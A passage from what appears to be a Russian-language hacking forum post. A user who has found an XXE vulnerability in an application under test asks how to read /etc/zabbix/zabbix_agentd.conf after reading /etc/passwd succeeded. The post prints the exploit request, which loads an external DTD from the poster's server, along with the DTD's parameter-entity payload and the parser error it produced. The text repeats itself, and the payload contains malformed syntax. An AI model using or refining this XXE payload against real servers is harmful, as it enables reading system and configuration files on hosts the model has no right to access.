Всем здравствуйте, проблема в следующем, была найдена уязвимость в тестируемом приложении XXE вообщем то все хорошо, с помощью нее можно прочитать например файл etc/passwd но интресной информации он не содержит, интересен файл etc/zabbix/zabbix_agent.conf
ну и некоторые другие, но проблема в том что если /etc/passwd читается без проблем то вот с этим файлом в частности возникли проблемы, вот что выдает парсер при попытке его прочитать
Вот сам запрос
вот файл ext.dtd
<!ENTITY % p1 SYSTEM "file:///etc/zabbix/zabbix_agentd.conf">
<!ENTITY % p2 "<<!ENTITY e1 SYSTEM 'file///%p1;'>">
%p2;
Я так полагаю ему не нравятся символы которые находятся в этом файле и он не хочет их пихать в ответ сервера. Но вот как это обойти. Может быть у кого то есть идеи по этому поводу? или кто то сталкивался с таким при эксплуатации это уязвимости?
ну и некоторые другие, но проблема в том что если /etc/passwd читается без проблем то вот с этим файлом в частности возникли проблемы, вот что выдает парсер при попытке его прочитать
Код:
Error 400 Exception loading Request: The declaration for the entity "e1" must end with '>'.Вот сам запрос
Код:
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "мой сервер/ext.dtd">
<foo>&e1;</foo>вот файл ext.dtd
<!ENTITY % p1 SYSTEM "file:///etc/zabbix/zabbix_agentd.conf">
<!ENTITY % p2 "<<!ENTITY e1 SYSTEM 'file///%p1;'>">
%p2;
Я так полагаю ему не нравятся символы которые находятся в этом файле и он не хочет их пихать в ответ сервера. Но вот как это обойти. Может быть у кого то есть идеи по этому поводу? или кто то сталкивался с таким при эксплуатации это уязвимости?